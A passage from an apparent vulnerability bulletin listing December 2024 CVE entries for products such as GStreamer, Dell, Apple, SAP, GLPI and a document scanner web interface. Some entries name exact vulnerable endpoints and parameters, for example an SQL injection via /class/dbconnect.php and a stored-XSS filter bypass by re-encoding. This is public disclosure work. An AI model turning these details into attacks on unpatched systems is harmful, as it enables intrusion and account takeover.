Due to missing input sanitization, an attacker can perform cross-site-scripting attacks and run arbitrary Javascript in the browser of other users. The "File Name" page (/cgi/uset.cgi?-cfilename) in the User Settings menu improperly filters the "file name" and wildcard character input field. By exploiting the wildcard character feature, attackers are able to store arbitrary Javascript code which is being triggered if the page is viewed afterwards, e.g. by higher privileged users such as admins. This attack can even be performed without being logged in because the affected functions are not fully protected. Without logging in, only the file name parameter of the "Default" User can be changed. | 2024-12-12 | not yet calculated | CVE-2024-28142 |
| n/a -- n/a |
The password change function at /cgi/admin.cgi does not require the current/old password, which makes the application vulnerable to account takeover. An attacker can use this to forcefully set a new password within the -rsetpass+-aaction+- parameter for a user without knowing the old password, e.g. by exploiting a CSRF issue. | 2024-12-12 | not yet calculated | CVE-2024-28143 |
| n/a -- n/a |
An attacker who can spoof the IP address and the User-Agent of a logged-in user can takeover the session because of flaws in the self-developed session management. If two users access the web interface from the same IP they are logged in as the other user. | 2024-12-12 | not yet calculated | CVE-2024-28144 |
| n/a -- n/a |
An unauthenticated attacker can perform an SQL injection by accessing the /class/dbconnect.php file and supplying malicious GET parameters. The HTTP GET parameters search, table, field, and value are vulnerable. For example, one SQL injection can be performed on the parameter "field" with the UNION keyword. | 2024-12-12 | not yet calculated | CVE-2024-28145 |
| n/a -- n/a |
The application uses several hard-coded credentials to encrypt config files during backup, to decrypt the new firmware during an update and some passwords allow a direct connection to the database server of the affected device. | 2024-12-12 | not yet calculated | CVE-2024-28146 |
| n/a -- n/a |
Dell RecoverPoint for VMs, version(s) 6.0.x contain(s) a Use of a Broken or Risky Cryptographic Algorithm vulnerability in the SSH. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Remote execution. | 2024-12-13 | not yet calculated | CVE-2024-28980 |
| n/a -- n/a |
rizin before v0.6.3 is vulnerable to Buffer Overflow via create_cache_bins, read_cache_accel, and rz_dyldcache_new_buf functions in librz/bin/format/mach0/dyldcache.c. | 2024-12-12 | not yet calculated | CVE-2024-31670 |
| n/a -- n/a |
Under certain conditions SAP BusinessObjects Business Intelligence platform allows an attacker to access information which would otherwise be restricted.This has low impact on Confidentiality with no impact on Integrity and Availability of the application. | 2024-12-10 | not yet calculated | CVE-2024-32732 |
| n/a -- n/a |
Due to missing input sanitization, an attacker can perform cross-site-scripting attacks and run arbitrary Javascript in the browser of other users. The login page at /cgi/slogin.cgi suffers from XSS due to improper input filtering of the -tsetup+-uuser parameter, which can only be exploited if the target user is not already logged in. This makes it ideal for login form phishing attempts. | 2024-12-12 | not yet calculated | CVE-2024-36494 |
| n/a -- n/a |
Due to missing input sanitization, an attacker can perform cross-site-scripting attacks and run arbitrary Javascript in the browser of other users. The "Edit Disclaimer Text" function of the configuration menu is vulnerable to stored XSS. Only the users Poweruser and Admin can use this function which is available at the URL https://$SCANNER/cgi/admin.cgi?-rdisclaimer+-apre The stored Javascript payload will be executed every time the ScanWizard is loaded, even in the Kiosk-mode browser. Version 7.40 implemented a fix, but it could be bypassed via URL-encoding the Javascript payload again. | 2024-12-12 | not yet calculated | CVE-2024-36498 |
| n/a -- n/a |
Dell PowerFlex appliance versions prior to IC 46.381.00 and IC 46.376.00, Dell PowerFlex rack versions prior to RCM 3.8.1.0 (for RCM 3.8.x train) and prior to RCM 3.7.6.0 (for RCM 3.7.x train), Dell PowerFlex custom node using PowerFlex Manager versions prior to 4.6.1.0, Dell InsightIQ versions prior to 5.1.1, and Dell Data Lakehouse versions prior to 1.2.0.0 contain an Improper Link Resolution Before File Access vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability to execute arbitrary code on the system. | 2024-12-10 | not yet calculated | CVE-2024-37143 |
| n/a -- n/a |
Dell PowerFlex appliance versions prior to IC 46.381.00 and IC 46.376.00, Dell PowerFlex rack versions prior to RCM 3.8.1.0 (for RCM 3.8.x train) and prior to RCM 3.7.6.0 (for RCM 3.7.x train), Dell PowerFlex custom node using PowerFlex Manager versions prior to 4.6.1.0, Dell InsightIQ versions prior to 5.1.1, and Dell Data Lakehouse versions prior to 1.2.0.0 contain an Insecure Storage of Sensitive Information vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to information disclosure. The attacker may be able to use information disclosed to gain unauthorized access to pods within the cluster. | 2024-12-10 | not yet calculated | CVE-2024-37144 |
| n/a -- n/a |
A heap-based buffer overflow in IPsec of Ivanti Connect Secure before version 22.7R2.3 allows a remote unauthenticated attacker to cause a denial of service. | 2024-12-12 | not yet calculated | CVE-2024-37377 |
| n/a -- n/a |
An out-of-bounds read in IPsec of Ivanti Connect Secure before version 22.7R2.1 allows a remote unauthenticated attacker to cause a denial of service. | 2024-12-12 | not yet calculated | CVE-2024-37401 |
| n/a -- n/a |
Dell ECS, versions prior to 3.8.0, contain(s) a Host Header Injection Vulnerability. A remote low-privileged attacker could potentially exploit this vulnerability to trigger redirections that leads to sensitive information leakage. | 2024-12-09 | not yet calculated | CVE-2024-38485 |
| n/a -- n/a |
Dell RecoverPoint for Virtual Machines 6.0.x contains a vulnerability. An improper Restriction of Excessive Authentication vulnerability where a Network attacker could potentially exploit this vulnerability, leading to a brute force attack or a dictionary attack against the RecoverPoint login form and a complete system compromise. This allows attackers to brute-force the password of valid users in an automated manner. | 2024-12-13 | not yet calculated | CVE-2024-38488 |
| n/a -- n/a |
Pentaminds CuroVMS v2.0.1 was discovered to contain exposed sensitive information. | 2024-12-09 | not yet calculated | CVE-2024-40582 |
| n/a -- n/a |
Pentaminds CuroVMS v2.0.1 was discovered to contain exposed credentials. | 2024-12-09 | not yet calculated | CVE-2024-40583 |
| n/a -- n/a |
Use of Multiple Resources with Duplicate Identifier (CWE-694) in the Controller 6000 and Controller 7000 Platforms could allow an attacker with physical access to HBUS communication cabling to perform a Denial-of-Service attack against HBUS connected devices, require a device reboot to resolve. This issue affects: Controller 6000 and Controller 7000 firmware versions 9.10 prior to vCR9.10.241108a (distributed in 9.10.2149 (MR4)), 9.00 prior to vCR9.00.241108a (distributed in 9.00.2374 (MR5)), 8.90 prior to vCR8.90.241107a (distributed in 8.90.2356 (MR6)), all versions of 8.80 and prior. | 2024-12-12 | not yet calculated | CVE-2024-41146 |
| n/a -- n/a |
Insertion of Sensitive Information into Log File (CWE-532) in the Gallagher Command Centre Alarm Transmitter feature could allow an authenticated Operator to view some security sensitive information to which they have not been granted access. This issue affects: Command Centre Server 9.10 prior to 9.10.2149 (MR4), 9.00 prior to 9.00.2374 (MR5), 8.90 prior to 8.90.2356 (MR6), all versions of 8.80 and prior. | 2024-12-12 | not yet calculated | CVE-2024-42407 |
| n/a -- n/a |
Dell PowerScale OneFS Versions 9.5.0.x through 9.8.0.x contain an uncontrolled resource consumption vulnerability. A low privilege remote attacker could potentially exploit this vulnerability, leading to denial of service. | 2024-12-09 | not yet calculated | CVE-2024-42426 |
| n/a -- n/a |
From the VSPC management agent machine, under condition that the management agent is authorized on the server, it is possible to perform Remote Code Execution (RCE) on the VSPC server machine. | 2024-12-12 | not yet calculated | CVE-2024-42448 |
| n/a -- n/a |
Missing Authorization vulnerability in Envato Security Team Sweet Date.This issue affects Sweet Date: from n/a through 3.7.3. | 2024-12-09 | not yet calculated | CVE-2024-43222 |
| n/a -- n/a |
The issue was addressed with improved memory handling. This issue is fixed in macOS Sequoia 15.2, macOS Sonoma 14.7.2. Parsing a maliciously crafted video file may lead to unexpected system termination. | 2024-12-12 | not yet calculated | CVE-2024-44220 |
| n/a -- n/a |
A permissions issue was addressed with additional restrictions. This issue is fixed in macOS Sequoia 15.2, macOS Ventura 13.7.2, macOS Sonoma 14.7.2. A malicious app may be able to gain root privileges. | 2024-12-12 | not yet calculated | CVE-2024-44224 |
| n/a -- n/a |
A logic issue was addressed with improved checks. This issue is fixed in iPadOS 17.7.3, watchOS 11.2, tvOS 18.2, macOS Sequoia 15.2, iOS 18.2 and iPadOS 18.2, macOS Ventura 13.7.2, macOS Sonoma 14.7.2. An app may be able to gain elevated privileges. | 2024-12-12 | not yet calculated | CVE-2024-44225 |
| n/a -- n/a |
The issue was addressed with improved bounds checks. This issue is fixed in iOS 18.1 and iPadOS 18.1. An attacker may be able to cause unexpected system termination or arbitrary code execution in DCP firmware. | 2024-12-12 | not yet calculated | CVE-2024-44241 |
| n/a -- n/a |
The issue was addressed with improved bounds checks. This issue is fixed in iOS 18.1 and iPadOS 18.1. An attacker may be able to cause unexpected system termination or arbitrary code execution in DCP firmware. | 2024-12-12 | not yet calculated | CVE-2024-44242 |
| n/a -- n/a |
A configuration issue was addressed with additional restrictions. This issue is fixed in macOS Sequoia 15.2. An app may be able to modify protected parts of the file system. | 2024-12-12 | not yet calculated | CVE-2024-44243 |
| n/a -- n/a |
The issue was addressed with improved memory handling. This issue is fixed in iPadOS 17.7.3, visionOS 2.2, macOS Sequoia 15.2, iOS 18.2 and iPadOS 18.2, macOS Sonoma 14.7.2. An app may be able to cause unexpected system termination or corrupt kernel memory. | 2024-12-12 | not yet calculated | CVE-2024-44245 |
| n/a -- n/a |
The issue was addressed with improved routing of Safari-originated requests. This issue is fixed in macOS Sequoia 15.2, iOS 18.2 and iPadOS 18.2, Safari 18.2, iPadOS 17.7.3. On a device with Private Relay enabled, adding a website to the Safari Reading List may reveal the originating IP address to the website. | 2024-12-12 | not yet calculated | CVE-2024-44246 |
| n/a -- n/a |
Applications and libraries which misuse the ServerConfig.PublicKeyCallback callback may be susceptible to an authorization bypass. The documentation for ServerConfig.PublicKeyCallback says that "A call to this function does not guarantee that the key offered is in fact used to authenticate." Specifically, the SSH protocol allows clients to inquire about whether a public key is acceptable before proving control of the corresponding private key. PublicKeyCallback may be called with multiple keys, and the order in which the keys were provided cannot be used to infer which key the client successfully authenticated with, if any. Some applications, which store the key(s) passed to PublicKeyCallback (or derived information) and make security relevant determinations based on it once the connection is established, may make incorrect assumptions. For example, an attacker may send public keys A and B, and then authenticate with A. PublicKeyCallback would be called only twice, first with A and then with B. A vulnerable application may then make authorization decisions based on key B for which the attacker does not actually control the private key. Since this API is widely misused, as a partial mitigation golang.org/x/cry...@v0.31.0 enforces the property that, when successfully authenticating via public key, the last key passed to ServerConfig.PublicKeyCallback will be the key used to authenticate the connection. PublicKeyCallback will now be called multiple times with the same key, if necessary. Note that the client may still not control the last key passed to PublicKeyCallback if the connection is then authenticated with a different method, such as PasswordCallback, KeyboardInteractiveCallback, or NoClientAuth. Users should be using the Extensions field of the Permissions return value from the various authentication callbacks to record data associated with the authentication attempt instead of referencing external state. Once the connection is established the state corresponding to the successful authentication attempt can be retrieved via the ServerConn.Permissions field. Note that some third-party libraries misuse the Permissions type by sharing it across authentication attempts; users of third-party libraries should refer to the relevant projects for guidance. | 2024-12-12 | not yet calculated | CVE-2024-45337 |
| n/a -- n/a |
OpenCTI is an open-source cyber threat intelligence platform. In versions below 6.2.18, because the function to limit the rate of OTP does not exist, an attacker with valid credentials or a malicious user who commits internal fraud can break through the two-factor authentication and hijack the account. This is because the otpLogin mutation does not implement One Time Password rate limiting. As of time of publication, it is unknown whether a patch is available. | 2024-12-12 | not yet calculated | CVE-2024-45404 |
| n/a -- n/a |
An issue was discovered in MSA Safety FieldServer Gateways and Embedded Modules with build revisions before 7.0.0. The FieldServer Gateway has internal users, whose access is supposed to be restricted to login locally on the device. However, an attacker can bypass the check for this, which might allow them to authenticate with an internal user account from the network (if they know their password). | 2024-12-10 | not yet calculated | CVE-2024-45493 |
| n/a -- n/a |
An issue was discovered in MSA Safety FieldServer Gateways and Embedded Modules with build revisions before 7.0.0. The FieldServer Gateway has an internally used shared administrative user account on all devices. The authentication for this user is implemented through an unsafe shared secret that is static in all affected firmware versions. | 2024-12-10 | not yet calculated | CVE-2024-45494 |
| n/a -- n/a |
Dell OpenManage Server Administrator, versions 11.0.1.0 and prior, contains an improper access control vulnerability. A remote low privileged user could potentially exploit this vulnerability via the HTTP GET method leading to unauthorized action with elevated privileges. | 2024-12-09 | not yet calculated | CVE-2024-45760 |
| n/a -- n/a |
Dell OpenManage Server Administrator, versions 11.0.1.0 and prior, contains an improper input validation vulnerability. A remote low-privileged malicious user could potentially exploit this vulnerability to load any web plugins or Java class leading to the possibility of altering the behavior of certain apps/OS or Denial of Service. | 2024-12-09 | not yet calculated | CVE-2024-45761 |
| n/a -- n/a |
TP-Link TL-WR845N(UN)_V4_200909 and TL-WR845N(UN)_V4_190219 was discovered to transmit user credentials in plaintext after executing a factory reset. | 2024-12-10 | not yet calculated | CVE-2024-46340 |
| n/a -- n/a |
TP-Link TL-WR845N(UN)_V4_190219 was discovered to transmit credentials in base64 encoded form, which can be easily decoded by an attacker executing a man-in-the-middle attack. | 2024-12-10 | not yet calculated | CVE-2024-46341 |
| n/a -- n/a |
An issue in the BYD Dilink Headunit System v3.0 to v4.0 allows attackers to bypass authentication via a bruteforce attack. | 2024-12-10 | not yet calculated | CVE-2024-46442 |
| n/a -- n/a |
unstructured v.0.14.2 and before is vulnerable to XML External Entity (XXE) via the XMLParser. | 2024-12-09 | not yet calculated | CVE-2024-46455 |
| n/a -- n/a |
A vulnerability was found in Romain Bourdon Wampserver all versions (discovered in v3.2.3 and v3.2.6) where unauthorized users could access sensitive information due to improper access control validation via PHP Info Page. This issue can lead to data leaks. | 2024-12-09 | not yet calculated | CVE-2024-46547 |
| n/a -- n/a |
Artifex Software mupdf v1.24.9 was discovered to contain a segmentation fault via the component /tools/pdfextract.c. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted PDF file. | 2024-12-10 | not yet calculated | CVE-2024-46657 |
| n/a -- n/a |
Insufficient validation of filenames against control characters in Apache Subversion repositories served via mod_dav_svn allows authenticated users with commit access to commit a corrupted revision, leading to disruption for users of the repository. All versions of Subversion up to and including Subversion 1.14.4 are affected if serving repositories via mod_dav_svn. Users are recommended to upgrade to version 1.14.5, which fixes this issue. Repositories served via other access methods are not affected. | 2024-12-09 | not yet calculated | CVE-2024-46901 |
| n/a -- n/a |
Software installed and run as a non-privileged user may conduct GPU system calls to read and write freed physical memory from the GPU. | 2024-12-13 | not yet calculated | CVE-2024-46971 |
| n/a -- n/a |
Dell Client Platform BIOS contains an Improper Input Validation vulnerability in an externally developed component. A high privileged attacker with local access could potentially exploit this vulnerability, leading to arbitrary code execution. | 2024-12-12 | not yet calculated | CVE-2024-47238 |
| n/a -- n/a |
Dell Avamar, version(s) 19.x, contain(s) an Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Command execution. | 2024-12-10 | not yet calculated | CVE-2024-47484 |
| n/a -- n/a |
GStreamer is a library for constructing graphs of media-handling components. The program attempts to reallocate the memory pointed to by stream->samples to accommodate stream->n_samples + samples_count elements of type QtDemuxSample. The problem is that samples_count is read from the input file. And if this value is big enough, this can lead to an integer overflow during the addition. As a consequence, g_try_renew might allocate memory for a significantly smaller number of elements than intended. Following this, the program iterates through samples_count elements and attempts to write samples_count number of elements, potentially exceeding the actual allocated memory size and causing an OOB-write. This vulnerability is fixed in 1.24.10. | 2024-12-12 | not yet calculated | CVE-2024-47537 |
| n/a -- n/a |
GStreamer is a library for constructing graphs of media-handling components. A stack-buffer overflow has been detected in the vorbis_handle_identification_packet function within gstvorbisdec.c. The position array is a stack-allocated buffer of size 64. If vd->vi.channels exceeds 64, the for loop will write beyond the boundaries of the position array The value written will always be GST_AUDIO_CHANNEL_POSITION_NONE. This vulnerability allows to overwrite the EIP address allocated in the stack. Additionally, this bug can overwrite the GstAudioInfo info structure. This vulnerability is fixed in 1.24.10. | 2024-12-12 | not yet calculated | CVE-2024-47538 |
| n/a -- n/a |
GStreamer is a library for constructing graphs of media-handling components. An out-of-bounds write vulnerability was identified in the convert_to_s334_1a function in isomp4/qtdemux.c. The vulnerability arises due to a discrepancy between the size of memory allocated to the storage array and the loop condition i * 2 < ccpair_size. Specifically, when ccpair_size is even, the allocated size in storage does not match the loop's expected bounds, resulting in an out-of-bounds write. This bug allows for the overwriting of up to 3 bytes beyond the allocated bounds of the storage array. This vulnerability is fixed in 1.24.10. | 2024-12-12 | not yet calculated | CVE-2024-47539 |
| n/a -- n/a |
GStreamer is a library for constructing graphs of media-handling components. An uninitialized stack variable vulnerability has been identified in the gst_matroska_demux_add_wvpk_header function within matroska-demux.c. When size < 4, the program calls gst_buffer_unmap with an uninitialized map variable. Then, in the gst_memory_unmap function, the program will attempt to unmap the buffer using the uninitialized map variable, causing a function pointer hijack, as it will jump to mem->allocator->mem_unmap_full or mem->allocator->mem_unmap. This vulnerability could allow an attacker to hijack the execution flow, potentially leading to code execution. This vulnerability is fixed in 1.24.10. | 2024-12-12 | not yet calculated | CVE-2024-47540 |
| n/a -- n/a |
GStreamer is a library for constructing graphs of media-handling components. An OOB-read vulnerability has been discovered in qtdemux_parse_container function within qtdemux.c. In the parent function qtdemux_parse_node, the value of length is not well checked. So, if length is big enough, it causes the pointer end to point beyond the boundaries of buffer. Subsequently, in the qtdemux_parse_container function, the while loop can trigger an OOB-read, accessing memory beyond the bounds of buf. This vulnerability can result in reading up to 4GB of process memory or potentially causing a segmentation fault (SEGV) when accessing invalid memory. This vulnerability is fixed in 1.24.10. | 2024-12-12 | not yet calculated | CVE-2024-47543 |
| n/a -- n/a |
GStreamer is a library for constructing graphs of media-handling components. The function qtdemux_parse_sbgp in qtdemux.c is affected by a null dereference vulnerability. This vulnerability is fixed in 1.24.10. | 2024-12-12 | not yet calculated | CVE-2024-47544 |
| n/a -- n/a |
GStreamer is a library for constructing graphs of media-handling components. An integer underflow has been detected in qtdemux_parse_trak function within qtdemux.c. During the strf parsing case, the subtraction size -= 40 can lead to a negative integer overflow if it is less than 40. If this happens, the subsequent call to gst_buffer_fill will invoke memcpy with a large tocopy size, resulting in an OOB-read. This vulnerability is fixed in 1.24.10. | 2024-12-12 | not yet calculated | CVE-2024-47545 |
| n/a -- n/a |
GStreamer is a library for constructing graphs of media-handling components. An integer underflow has been detected in extract_cc_from_data function within qtdemux.c. In the FOURCC_c708 case, the subtraction atom_length - 8 may result in an underflow if atom_length is less than 8. When that subtraction underflows, *cclen ends up being a large number, and then cclen is passed to g_memdup2 leading to an out-of-bounds (OOB) read. This vulnerability is fixed in 1.24.10. | 2024-12-12 | not yet calculated | CVE-2024-47546 |
| n/a -- n/a |
SAP Product Lifecycle Costing Client (versions below 4.7.1) application loads on demand a DLL that is available with Windows OS. This DLL is loaded from the computer running SAP Product Lifecycle Costing Client application. That particular DLL could be replaced by a malicious one, that could execute commands as being part of SAP Product Lifecycle Costing Client Application. On a successful attack, it can cause a low impact to confidentiality but no impact to the integrity and availability of the application. | 2024-12-10 | not yet calculated | CVE-2024-47576 |
| n/a -- n/a |
Webservice API endpoints for Assisted Service Module within SAP Commerce Cloud has information disclosure vulnerability. When an authorized agent searches for customer to manage their accounts, the request url includes customer data and it is recorded in server logs. If an attacker impersonating as authorized admin visits such server logs, then they get access to the customer data. The amount of leaked confidential data however is extremely limited, and the attacker has no control over what data is leaked. | 2024-12-10 | not yet calculated | CVE-2024-47577 |
| n/a -- n/a |
Adobe Document Service allows an attacker with administrator privileges to send a crafted request from a vulnerable web application. It is usually used to target internal systems behind firewalls that are normally inaccessible to an attacker from the external network, resulting in a Server-Side Request Forgery vulnerability. On successful exploitation, the attacker can read or modify any file and/or make the entire system unavailable. | 2024-12-10 | not yet calculated | CVE-2024-47578 |
| n/a -- n/a |
An attacker authenticated as an administrator can use an exposed webservice to upload or download a custom PDF font file on the system server. Using the upload functionality to copy an internal file into a font file and subsequently using the download functionality to retrieve that file allows the attacker to read any file on the server with no effect on integrity or availability | 2024-12-10 | not yet calculated | CVE-2024-47579 |
| n/a -- n/a |
An attacker authenticated as an administrator can use an exposed webservice to create a PDF with an embedded attachment. By specifying the file to be an internal server file and subsequently downloading the generated PDF, the attacker can read any file on the server with no effect on integrity or availability. | 2024-12-10 | not yet calculated | CVE-2024-47580 |
| n/a -- n/a |
SAP HCM Approve Timesheets Version 4 application does not perform necessary authorization checks for an authenticated user, resulting in escalation of privileges.There is low impact on integrity of the application. Confidentiality and availibility are not impacted. | 2024-12-10 | not yet calculated | CVE-2024-47581 |
| n/a -- n/a |
Due to missing validation of XML input, an unauthenticated attacker could send malicious input to an endpoint which leads to XML Entity Expansion attack. This causes limited impact on availability of the application. | 2024-12-10 | not yet calculated | CVE-2024-47582 |
| n/a -- n/a |
SAP NetWeaver Application Server for ABAP and ABAP Platform allows an authenticated attacker to gain higher access levels than they should have by exploiting improper authorization checks, resulting in privilege escalation. While authorizations for import and export are distinguished, a single authorization is applied for both, which may contribute to these risks. On successful exploitation, this can result in potential security concerns. However, it has no impact on the integrity and availability of the application and may have only a low impact on data confidentiality. | 2024-12-10 | not yet calculated | CVE-2024-47585 |
| n/a -- n/a |
GStreamer is a library for constructing graphs of media-handling components. An OOB-read has been discovered in the qtdemux_parse_svq3_stsd_data function within qtdemux.c. In the FOURCC_SMI_ case, seqh_size is read from the input file without proper validation. If seqh_size is greater than the remaining size of the data buffer, it can lead to an OOB-read in the following call to gst_buffer_fill, which internally uses memcpy. This vulnerability can result in reading up to 4GB of process memory or potentially causing a segmentation fault (SEGV) when accessing invalid memory. This vulnerability is fixed in 1.24.10. | 2024-12-12 | not yet calculated | CVE-2024-47596 |
| n/a -- n/a |
GStreamer is a library for constructing graphs of media-handling components. An OOB-read has been detected in the function qtdemux_parse_samples within qtdemux.c. This issue arises when the function qtdemux_parse_samples reads data beyond the boundaries of the stream->stco buffer. The following code snippet shows the call to qt_atom_parser_get_offset_unchecked, which leads to the OOB-read when parsing the provided GHSL-2024-245_crash1.mp4 file. This issue may lead to read up to 8 bytes out-of-bounds. This vulnerability is fixed in 1.24.10. | 2024-12-12 | not yet calculated | CVE-2024-47597 |
| n/a -- n/a |
GStreamer is a library for constructing graphs of media-handling components. An OOB-read vulnerability has been discovered in the qtdemux_merge_sample_table function within qtdemux.c. The problem is that the size of the stts buffer isn't properly checked before reading stts_duration, allowing the program to read 4 bytes beyond the boundaries of stts->data. This vulnerability reads up to 4 bytes past the allocated bounds of the stts array. This vulnerability is fixed in 1.24.10. | 2024-12-12 | not yet calculated | CVE-2024-47598 |
| n/a -- n/a |
GStreamer is a library for constructing graphs of media-handling components. A null pointer dereference vulnerability has been discovered in the gst_jpeg_dec_negotiate function in gstjpegdec.c. This function does not check for a NULL return value from gst_video_decoder_set_output_state. When this happens, dereferences of the outstate pointer will lead to a null pointer dereference. This vulnerability can result in a Denial of Service (DoS) by triggering a segmentation fault (SEGV). This vulnerability is fixed in 1.24.10. | 2024-12-12 | not yet calculated | CVE-2024-47599 |
| n/a -- n/a |
GStreamer is a library for constructing graphs of media-handling components. An OOB-read vulnerability has been detected in the format_channel_mask function in gst-discoverer.c. The vulnerability affects the local array position, which is defined with a fixed size of 64 elements. However, the function gst_discoverer_audio_info_get_channels may return a guint channels value greater than 64. This causes the for loop to attempt access beyond the bounds of the position array, resulting in an OOB-read when an index greater than 63 is used. This vulnerability can result in reading unintended bytes from the stack. Additionally, the dereference of value->value_nick after the OOB-read can lead to further memory corruption or undefined behavior. This vulnerability is fixed in 1.24.10. | 2024-12-12 | not yet calculated | CVE-2024-47600 |
| n/a -- n/a |
GStreamer is a library for constructing graphs of media-handling components. A null pointer dereference vulnerability has been discovered in the gst_matroska_demux_parse_blockgroup_or_simpleblock function within matroska-demux.c. This function does not properly check the validity of the GstBuffer *sub pointer before performing dereferences. As a result, null pointer dereferences may occur. This vulnerability is fixed in 1.24.10. | 2024-12-12 | not yet calculated | CVE-2024-47601 |
| n/a -- n/a |
GStreamer is a library for constructing graphs of media-handling components. A null pointer dereference vulnerability has been discovered in the gst_matroska_demux_add_wvpk_header function within matroska-demux.c. This function does not properly check the validity of the stream->codec_priv pointer in the following code. If stream->codec_priv is NULL, the call to GST_READ_UINT16_LE will attempt to dereference a null pointer, leading to a crash of the application. This vulnerability is fixed in 1.24.10. | 2024-12-12 | not yet calculated | CVE-2024-47602 |
| n/a -- n/a |
GStreamer is a library for constructing graphs of media-handling components. A null pointer dereference vulnerability has been discovered in the gst_matroska_demux_update_tracks function within matroska-demux.c. The vulnerability occurs when the gst_caps_is_equal function is called with invalid caps values. If this happen, then in the function gst_buffer_get_size the call to GST_BUFFER_MEM_PTR can return a null pointer. Attempting to dereference the size field of this null pointer results in a null pointer dereference. This vulnerability is fixed in 1.24.10. | 2024-12-12 | not yet calculated | CVE-2024-47603 |
| n/a -- n/a |
GStreamer is a library for constructing graphs of media-handling components. An integer underflow has been detected in the function qtdemux_parse_theora_extension within qtdemux.c. The vulnerability occurs due to an underflow of the gint size variable, which causes size to hold a large unintended value when cast to an unsigned integer. This 32-bit negative value is then cast to a 64-bit unsigned integer (0xfffffffffffffffa) in a subsequent call to gst_buffer_new_and_alloc. The function gst_buffer_new_allocate then attempts to allocate memory, eventually calling _sysmem_new_block. The function _sysmem_new_block adds alignment and header size to the (unsigned) size, causing the overflow of the 'slice_size' variable. As a result, only 0x89 bytes are allocated, despite the large input size. When the following memcpy call occurs in gst_buffer_fill, the data from the input file will overwrite the content of the GstMapInfo info structure. Finally, during the call to gst_memory_unmap, the overwritten memory may cause a function pointer hijack, as the mem->allocator->mem_unmap_full function is called with a corrupted pointer. This function pointer overwrite could allow an attacker to alter the execution flow of the program, leading to arbitrary code execution. This vulnerability is fixed in 1.24.10. | 2024-12-12 | not yet calculated | CVE-2024-47606 |
| n/a -- n/a |
GStreamer is a library for constructing graphs of media-handling components. stack-buffer overflow has been detected in the gst_opus_dec_parse_header function within `gstopusdec.c'. The pos array is a stack-allocated buffer of size 64. If n_channels exceeds 64, the for loop will write beyond the boundaries of the pos array. The value written will always be GST_AUDIO_CHANNEL_POSITION_NONE. This bug allows to overwrite the EIP address allocated in the stack. This vulnerability is fixed in 1.24.10. | 2024-12-12 | not yet calculated | CVE-2024-47607 |
| n/a -- n/a |
GStreamer is a library for constructing graphs of media-handling components. A stack-buffer overflow has been detected in the vorbis_handle_identification_packet function within gstvorbisdec.c. The position array is a stack-allocated buffer of size 64. If vd->vi.channels exceeds 64, the for loop will write beyond the boundaries of the position array. The value written will always be GST_AUDIO_CHANNEL_POSITION_NONE. This vulnerability allows to overwrite the EIP address allocated in the stack. Additionally, this bug can overwrite the GstAudioInfo info structure. This vulnerability is fixed in 1.24.10. | 2024-12-12 | not yet calculated | CVE-2024-47613 |
| n/a -- n/a |
GStreamer is a library for constructing graphs of media-handling components. An OOB-Write has been detected in the function gst_parse_vorbis_setup_packet within vorbis_parse.c. The integer size is read from the input file without proper validation. As a result, size can exceed the fixed size of the pad->vorbis_mode_sizes array (which size is 256). When this happens, the for loop overwrites the entire pad structure with 0s and 1s, affecting adjacent memory as well. This OOB-write can overwrite up to 380 bytes of memory beyond the boundaries of the pad->vorbis_mode_sizes array. This vulnerability is fixed in 1.24.10. | 2024-12-12 | not yet calculated | CVE-2024-47615 |
| n/a -- n/a |
GLPI is a free asset and IT management software package. Starting in version 9.3.0 and prior to version 10.0.17, an authenticated user can use the API to take control of any user that have the same or a lower level of privileges. Version 10.0.17 contains a patch for this issue. | 2024-12-11 | not yet calculated | CVE-2024-47758 |
| n/a -- n/a |
GLPI is a free asset and IT management software package. Starting in version 9.1.0 and prior to version 10.0.17, a technician with an access to the API can take control of an account with higher privileges. Version 10.0.17 contains a patch for this issue. | 2024-12-11 | not yet calculated | CVE-2024-47760 |
| n/a -- n/a |
GLPI is a free asset and IT management software package. Starting in version 0.80 and prior to version 10.0.17, an administrator with access to the sent notifications contents can take control of an account with higher privileges. Version 10.0.17 contains a patch for this issue. | 2024-12-11 | not yet calculated | CVE-2024-47761 |
| n/a -- n/a |
GStreamer is a library for constructing graphs of media-handling components. An OOB-read vulnerability has been identified in the gst_avi_subtitle_parse_gab2_chunk function within gstavisubtitle.c. The function reads the name_length value directly from the input file without checking it properly. Then, the a condition, does not properly handle cases where name_length is greater than 0xFFFFFFFF - 17, causing an integer overflow. In such scenario, the function attempts to access memory beyond the buffer leading to an OOB-read. This vulnerability is fixed in 1.24.10. | 2024-12-12 | not yet calculated | CVE-2024-47774 |
| n/a -- n/a |
GStreamer is a library for constructing graphs of media-handling components. An OOB-read vulnerability has been found in the parse_ds64 function within gstwavparse.c. The parse_ds64 function does not check that the buffer buf contains sufficient data before attempting to read from it, doing multiple GST_READ_UINT32_LE operations without performing boundary checks. This can lead to an OOB-read when buf is smaller than expected. This vulnerability allows reading beyond the bounds of the data buffer, potentially leading to a crash (denial of service) or the leak of sensitive data. This vulnerability is fixed in 1.24.10. | 2024-12-12 | not yet calculated | CVE-2024-47775 |
| n/a -- n/a |
GStreamer is a library for constructing graphs of media-handling components. An OOB-read has been discovered in gst_wavparse_cue_chunk within gstwavparse.c. The vulnerability happens due to a discrepancy between the size of the data buffer and the size value provided to the function. This mismatch causes the comparison if (size < 4 + ncues * 24) to fail in some cases, allowing the subsequent loop to access beyond the bounds of the data buffer. The root cause of this discrepancy stems from a miscalculation when clipping the chunk size based on upstream data size. This vulnerability allows reading beyond the bounds of the data buffer, potentially leading to a crash (denial of service) or the leak of sensitive data. This vulnerability is fixed in 1.24.10. | 2024-12-12 | not yet calculated | CVE-2024-47776 |
| n/a -- n/a |
GStreamer is a library for constructing graphs of media-handling components. An OOB-read vulnerability has been identified in the gst_wavparse_smpl_chunk function within gstwavparse.c. This function attempts to read 4 bytes from the data + 12 offset without checking if the size of the data buffer is sufficient. If the buffer is too small, the function reads beyond its bounds. This vulnerability may result in reading 4 bytes out of the boundaries of the data buffer. This vulnerability is fixed in 1.24.10. | 2024-12-12 | not yet calculated | CVE-2024-47777 |
| n/a -- n/a |
